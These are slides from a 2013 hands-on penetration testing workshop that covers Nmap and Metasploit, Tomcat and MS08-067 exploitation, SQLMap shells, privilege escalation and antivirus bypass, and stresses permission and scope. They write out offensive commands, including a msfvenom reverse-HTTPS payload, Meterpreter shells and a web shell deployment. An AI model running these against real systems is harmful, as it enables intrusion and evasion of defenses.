Hands on Penetration Testing 101 DC612: March 9, 2013

DC612 Day - Hands on Penetration Testing 101

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Title: Hands on Penetration Testing 101 by Scott Sutherland & Karl Fosaaen Abstract: The goal of this training is to introduce attendees to standard penetration test methodologies, tools, and techniques. Hands on labs will cover the basics of asset discovery, vulnerability enumeration, system penetration, privilege escalation, and bypassing end point protection. During the labs, common vulnerabilities will be leveraged to illustrate attack techniques, using freely available tools such as Nmap and Metasploit. This training will be valuable to anyone interested in gaining a better understanding of penetration testing or to system administrators trying to understand common attack approaches.

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Hands on Penetration Testing 101DC612: March 9, 2013

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• Karl Fosaaen • Scott Sutherland---Security Consultants@ NetSPI

Who are we?

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Presentation Overview

• What is a “Penetration Test”?• Why do companies “Pen test”?• Assessment VS. penetration test• Common penetration test approach • Rules of engagement• Nmap intro• Metasploit intro• Pen test labs• Wrap Up

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What is Penetration Testing?

“The process of evaluating systems, applications, and protocols with the intent of identifying vulnerabilities from the perspective of an unprivileged or trusted user to determine the potential real world impacts…”

“…legally and under contract”

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Why do Companies Pen Test?

• Compliance requirements• Identify unknown security gaps • Prioritize existing security initiatives• Validate existing controls• Prevent data breaches • Test IDS / IPS / IRP

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What are the Technical Objectives?

• Client specific objectives first• Identify and verify all entry points• Identify critical escalation points• Gain unauthorized access to: ‒ Application functionality‒ Critical systems‒ Sensitive data

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Assessment VS. Penetration

• Vulnerability Assessment and Penetration Testing Answer:‒What are my system layer vulnerabilities?‒Where are my system layer vulnerabilities?‒ How wide spread are my system layer

vulnerabilities?‒ Can I identify attacks?‒ How do I fix my vulnerabilities?

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Assessment VS. Penetration

• Penetration Testing Answers:‒ What are my high impact network layer issues?‒ What are my high impact application layer issues?‒ Can an attacker gain unauthorized access to:

• critical infrastructure that provides privileged access or cause service disruptions

• critical application functionality that the business depends on

• sensitive data that the business would be required to report on if a breach occurs

‒ Can an attacker bypass our IPS / WAF? ‒ Can an attacker pivot from environment A to

environment B?

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Rules of Engagement

• Have fun, but…Hack Responsibly!• Written permission• Stay in scope• No DoS• Don’t change major state• Restore state• Clear communication

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Intro to the Common Toolsets




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Intro to the Common Toolsets




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Installing Backtrack

• Goal‒ Consolidate tools, and generally make a

penetration testing platform that is free.• Download Latest BT ISO‒ http://www.backtrack-linux.org/downloads/‒ Click download and choose ISO

• Download UNetbootin or YUMI‒ http://unetbootin.sourceforge.net/‒ http://www.pendrivelinux.com/yumi-multiboot-

usb-creator/• Install to USB‒ Follow program wizards to write ISO to USB

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Intro to the Common Toolsets




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Nmap Introduction

• Purpose: Service mapping, and vulnerability scanning• Download: insecure.org • Language: Based in C/C++, scripting in LUA• Modules types: Mostly enumeration, but

there are some exploits modules• Execution options: nmap cli and zenmap GUI• Scripts: Ship with nmap by default, but can

be download from insecure.org

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Installing Nmap: Linux (Ubuntu)

• Download the latest build from:‒ http://nmap.org/download.html ‒ svn co –username guest

• Dependencies: gcc, openssl, and make• Install as root• apt-get install nmap• Install from source:‒ ./configure && make && make install

• Flags exist to remove features--without-zenmap

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Installing Nmap: Windows

• Windows‒ Download the latest from

http://nmap.org/download.html‒ Login as admin, double click, next, next, done‒ Say YES! To winpcap

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Nmap Tools

• Nmap: Used for network mapping and auditing• Ncat: Similar to netcat, but better• Ndiff: Used for comparing nmap scans• Nping: Used for understand firewall rules,

detect corruptions, and etc• Zenmap: Gui interface

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Nmap Introduction

• LUA Scripts

Located in: • Script Categories:‒ Auth‒ Broadcast‒ Brute‒ default‒ Discovery‒ Dos‒ Exploit


‒ External‒ Fuzzer‒ Intrusive‒Malware‒ Safe‒ version‒ vulnhttp://nmap.org/nsedoc/scripts/

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Intro to the Common Toolsets




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Metasploit Introduction

• Purpose: Develop and use scanners, admin tools, and exploits• Download: metasploit.com or clone

github.com repository.• Language: Ruby• Modules: Auxiliaries, Exploits, Encoders,

Nops, Payloads, Post• Execution options: msfconsole, msfcli, web

interfaces, rpc interface, armitage• Scripting: modules, resource scripts, startup

scripts, auto-run scripts, IRB, railgun

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Installing Metasploit: Windows

• Disable anti-virus or create directory exception• Download from metasploit.com‒ Login as admin, double click, next, next, done

• Download git client for Windows‒ git clone https://

github.com/rapid7/metasploit-framework.git• Service / process heavy

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Installing Metasploit: Linux (Ubuntu)

• apt-get update && apt-get install metasploit• Download git client for Linux‒ git clone


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Metasploit Introduction

•Modules are located in the following default Metasploit directories:

• Auxiliary: /msf3/modules/auxiliary• Exploit: /msf3/modules/exploits• Encoders: /msf3/modules/encoders• Nops: /msf3/modules/nops• Payloads: /msf3/modules/payloads• Post: /msf3/modules/post

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Metasploit: Console Commands

• ?• search tomcat• use ‒exploit/windows/smb/ms08_067_netapi

• show options• show advance options• set & setg ‒ payload windows/meterpreter/reverse_https

• exploit & run• resource

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Metasploit: Meterpreter Commands

• ipconfig• ls• ps• migrate• shell• execute• Post modules• AutoRunScript (single or multiple


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Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

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Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

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Asset Discovery: Overview (internal)

• Goal: Identify active systems and services. This should include web applications and web services. • Common Methods:‒Passive identification (Sniffing)‒Directory Lookups (DNS, ADS, etc)‒Active identification (Scanning - Direct)‒Active identification (Scanning - Broadcast)

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Asset Discovery: Labs

• Passive Network Mapping‒Wireshark: GUI‒ Network Miner: GUI‒ Cain and Abel

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Asset Discovery: Labs

• Directory Listings‒ ADS Computer names via computeraccounts$

• Dumpacl • Metasploit smb_lookupsid module• adfind.exe (joeware)

‒ DNS Server Lookups• Nslookup –type=SRV _ldap._tcp.domain.com• Dnsrecon.py

‒ DNS Zone Transfer• Dig axfr domain.com @dnsserver• Dnsrecon.py

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Asset Discovery: Labs

• Target IP Formats‒ Single

• Nmap‒Comma Separated

• Nmap,‒Range

• Nmap‒CIDR

• Nmap‒ File

• Nmap –iL ipaddress.txt

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Asset Discovery: Labs

• Target Port Formats‒All

• Nmap –p-‒ Single

• Nmap –p80‒Comma

• Nmap –p80,443‒Range

• Nmap –p1-65535‒Protocol

• Nmap –sT –sU -pT:80,U:161

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Asset Discovery: Labs

• List Scanning (RDNS)‒Nmap –sL

• Active Ping Sweeping‒ ICMP TS: Nmap –PE‒ SYN: Nmap –PS –p443‒ACK: Nmap –PA –p80

• Active Broadcast Ping‒ARP: Nmap –PR‒Scripts:

• Nmap --script=“broadcast”

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Asset Discovery: Labs

• Basic Port Scanning‒TCP Full Connect• Nmap –sT

‒TCP SYN• Nmap -sS

‒No Ping• Nmap –sS –Pn

‒UDP • Nmap –sU

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Asset Discovery: Labs

• Basic Performance Tuning‒Timing

• Nmap –sS –p80-443 –Pn –t 5• Higher is faster, but less accurate

‒Disable RDNS lookup• Nmap –sS –p80-443 –Pn –t 5 –n• Nmap –sS –p80-443 –Pn –t 5 -R

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Asset Discovery: Labs

• Active Finger Printing‒Service finger printing• Nmap -sV

‒Operating system finger printing• Nmap –O

‒ Service and OS finger printing, script scanning, and traceroute• Nmap -A

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Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

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Vulnerability Enumeration: Overview

• Goal: Identify vulnerabilities at the application, server, and network layers. Weed out false positives and highlight potential entry points.• Common Methods:‒ Automated identification

• All layers: Many tools, multiple rounds‒Manual identification

• Verify automated findings• Application attacks• Password attacks (defaults and guessing)• Protocol attacks

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Vulnerability Enumeration: Labs

• Basic Banner Grabbing‒ Ncat –p 80‒ Ncat –ssl –p443‒ Ncat –U –p161

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Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap‒ Tomcat Case Study

• Identify service with Nmap• Nmap –sV –p22,514,8009,8080,9090• Verify credentials manually• Nmap --script=“vuln”

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Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with MSF‒ Tomcat Case Study

• Find servers• use auxiliary/admin/http/tomcat_administration

• Find weak passwords• use auxiliary/scanner/http/tomcat_mgr_login

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Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap‒MS08_067 Case Study

• Identify with Nmap• nmap --script smb-check-vulns.nse -p445

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Vulnerability Enumeration: Labs

• Scanning for vulnerabilities with Nmap‒ SQL Injection Case Study

• Identify with SQLMap• python sqlmap.py -u -s session_log

• Verify Manually

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Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

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Penetration: Overview

• Goal: Gain initial unauthorized access to systems, applications, and sensitive data.• Common Methods:

Generally, vulnerabilities result in read access, write access, or arbitrary command execution.‒ Default credentials‒Weak protocols‒ SQL Injection‒ Upload vulnerabilities ‒Missing critical patches

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Penetration: Labs

• Tomcat Case Study:‒ Log into tomcat with default password‒Create the war file

• Or use the CMD.war from the additional tools folder • Custom = unpack,edit,repack• http://www.nruns.com/_downloads/


‒Publish the payload to get the web shell‒Navigate to the /cmd/cmd.jsp page

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Penetration: Labs

• MS08_067 Case Study:‒Run Metasploit Exploit

• use exploit/windows/smb/ms08_067_netapi• set RHOST• exploit

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Penetration: Labs

• SQL Injection Case Study:‒Use SQLMap to get SQL Shell

• python sqlpmap/sqlmap.py -u --sql-shell -s session_log

‒ Use SQLMap to get Meterpreter Shell• python sqlmap.py -u -v 1 --os-pwn --msf-path=/opt/framework3/msf3 -s session_log --priv-esc

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Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

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Escalation: Overview

• Goal: Escalate privileges to gain access to critical resources.• Common Methods (Windows):‒ Getsystem (with UAC Bypass)‒ Clear text passwords‒ Known local exploits (sysret example)‒ Service attacks‒ Scheduler attacks‒ Impersonate Tokens (incognito or migrate)‒ Dump passwords (mimikatz, and msfpost)‒ Pass the hash (smart_hashdump + psexec)

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Escalation: Labs

• GETSYSTEM‒Configure psexec with autorunscript

• Attack Scheduled Tasks‒Create scheduled task to run as system‒Configure task to run batch script files‒Give “Everyone” write access to scripts

• Attack Insecure Services‒Create insecurely registered service‒Drop evil program.exe‒Restart server for shell (auto migrate)

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Bypassing Anti-Virus: Overview

• Goal: Execute malicious code without getting squashed by anti-virus.• Common Methods ‒ Bypass anti-virus configuration‒ Source code manipulation‒ Binary manipulation‒ Process / thread manipulation

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Bypassing Anti-Virus: Labs

• Bypass configuration‒ Create a MSF DLL with reverse https payload

• msfvenom -p windows/meterpreter/reverse_https -e -i 1 LHOST= LPORT=55555 -f dll 1 > payload.dll

• Process Injection‒ Create a powershell injection payload with

ps_webshellscript• Pack an existing files‒Modify binary‒ Pack mimikatz with mpress, upx, or iexpress

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Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

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Evidence Gathering (Pilfering): Labs

• Finding Sensitive Files‒Common Locations• Databases• Text files• Applications

• Automated tools‒Spider‒Metasploit post modules

• auxiliary/admin/mssql/mssql_findandsampledata

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Evidence Gathering (Pilfering): Labs

• Windows‒Find

• Linux‒Find‒Locate‒Grep/sed/awk

• Applications‒Thick client and Web apps

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Common Penetration Test Approach

• Kickoff: Scope, cost, testing windows, risks etc• Information Gathering• Vulnerability Enumeration• Penetration• Escalation • Evidence Gathering (Pilfering)• Clean up• Report Creation• Report Delivery and Review• Remediation

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Clean Up: Overview

• Goal: Be polite and leave the environment as you found it.

• Standard Clean Items‒ Remove backdoors‒ Remove all uploaded and generated files‒ Restore all service states‒ Restore all other configuration states‒ Remove accounts that were created

• Leave the logs – the goal is transparency

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Wrap Up

• We covered:‒What penetration testing is‒Why companies pay for penetration testing‒What the rules of engagement are‒What the common approach is‒ How to leverage a few common vulnerabilities

But most importantly don’t for get to….

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Questions, comments, curses?